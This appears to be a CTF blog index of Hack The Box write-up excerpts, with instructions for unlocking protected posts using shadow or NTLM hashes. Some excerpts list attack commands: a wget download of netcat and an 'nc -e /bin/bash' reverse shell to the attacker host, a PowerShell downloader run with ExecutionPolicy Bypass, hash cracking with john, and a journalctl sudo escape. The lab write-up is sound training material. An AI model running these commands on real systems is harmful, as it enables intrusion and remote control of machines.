CTF

Passwords for the Active Hack the Box machines

Byadmin April 19, 2020June 6, 2020

New methods

For linux

-cat /etc/shadow
Example this.

root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::
So use the highlighted part as the password.
So password = YIFGN9YscCV72BjFtx/

For Windows

Use ntlm hash
Example Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c:::
password = 31d6cfe0d16ae931b73c59d7e0c

Old methods

For linux

1- cat /etc/shadow
2-copy whole hash(root)
root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::
3-Then find it's MD5 sum and that's your password for writeup

For windows

1-Find root hash with hashdump.exe or any other tool.
2-Then convert that also into MD5 sum
3-That's your password for the Writeup

CTF | HTB | Retired

Hack the box(HTB) Traverxec write up
Byadmin April 11, 2020November 12, 2020

Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a…

Read More Hack the box(HTB) Traverxec write up
Active | Active machines | CTF | HTB

Hackthebox Sneakymailer writeup
Byadmin October 3, 2020October 3, 2020

Introduction Column Details Name Sneakymailer IP 10.10.10.197 Points 30 Os Linux Difficulty Medium Creator Sulcud Out On 11 July 2020 Steps involved 1-Port Scan 2-Basic website enumeration 3-Sending Spoofed mail 4-Login into imap using paulbyrd creds and extracting mails 5-Login into ftp using developer creds 6-Uploading a Reverse shell through ftp 7-Subdomain enumeration 8-Getting shell…

Read More Hackthebox Sneakymailer writeup
CTF | HTB | Retired

Hack the box Arctic writeup
Byadmin April 16, 2020November 12, 2020

Steps involved 1-Port scanning2-Exploiting ColdFusion 8 on port 85003-Cracking hash4-uploading reverse shell5-privilage escalation 6-Getting root.txt Commands Used 1-nmap -sC -sV -O -p- -v -oV 10.10.10.112-hash-identifier3-john hash –wordlist=/root/Desktop/rockyou.txt4-echo $webclient = New-Object System.Net.WebClient >>wget.ps15-echo $url = “http://10.10.14.20:8000/Chimichurri.exe” >>wget.ps16-echo $file = “exploit.exe” >>wget.ps17- echo $webclient.DownloadFile($url,$file) >>wget.ps1 8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 Port Scanning Nmap 7.70…

Read More Hack the box Arctic writeup
Active | Active machines | CTF | Linux Boxes

Hackthebox Passage writeup
Byadmin November 11, 2020November 11, 2020

It is a great machine from hackthebox .The OS is Linux it includes little web enumeration which leads to explotitaion of the New management system.Further enumeration gave the creds for the user .then switching amother user with some guess work.And privilege escalation by exploiting usb-creator

Read More Hackthebox Passage writeup
Cheatsheet | CTF

Cheatsheet for HTB
Byadmin February 20, 2020April 19, 2021

Linux General ctrl + r Search History reverse Run Script at startup update-rc.d -f /path/to/the/script remove Delete Script from defaults Vim i for insert mode esc to leave insert mode To be continued with macros and all this handy shit Tmux Config from ippsec. First press the prefix ctrl + a, then release the buttons…

Read More Cheatsheet for HTB
CTF | HTB | Retired

Hackthebox sauna Writeup – 10.10.10.175
Byadmin July 5, 2020September 1, 2020

Use the NTLM hash d948**************************f to unlock the content.Hackthebox sauna writeup

Read More Hackthebox sauna Writeup – 10.10.10.175

New methods

For linux

For Windows

Old methods

For linux

For windows

Similar Posts

Leave a Reply Cancel reply